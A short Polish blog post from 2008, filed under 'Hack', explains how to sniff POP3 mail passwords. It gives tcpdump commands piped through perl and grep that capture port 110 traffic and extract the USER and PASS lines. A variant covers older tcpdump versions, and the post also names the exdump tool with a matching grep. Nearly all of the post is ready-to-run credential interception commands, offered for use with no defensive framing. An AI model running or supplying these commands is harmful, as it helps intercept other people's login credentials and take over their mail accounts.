Sniffowanie haseł POP3
Posted on Fri 22 August 2008 in Hack
• [1 min read]
Wysniffować pasełka do POP-a da się odpalając tcpdump i pompując output przez grepa:
tcpdump -n -X -s 1514 tcp port 110 and dst host my.ad.dr.es \|
perl -p -e 's/^.*\\t(.\*)\\n/$1/; s/^(\\d\\d:)/\\n$1/' \|
grep -B 1 -E 'USER|PASS'
A dla starszej wersji tcpdumpa, bez opcji "-X":
tcpdump -n -s 1514 tcp port 110 and dst host my.ad.dr.es \|
perl -p -e 's/^.*\\t(.\*)\\n/$1/ && s/\\s+//g &&
s/([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg &&
s/([\\000-\\011\\013-\\037])/./g;
s/^(\\d\\d:)/\\n$1/' \|
grep -B 1 -E 'USER|PASS'
Inny pomysł to pobranie narzędzia exdump ze strony oficjalnej albo z mojego archiwum.
A kompilacji wydać komendę:
exdump -ctu -p 110 -v \| grep -E 'USER|PASS'
I czekać cierpliwie.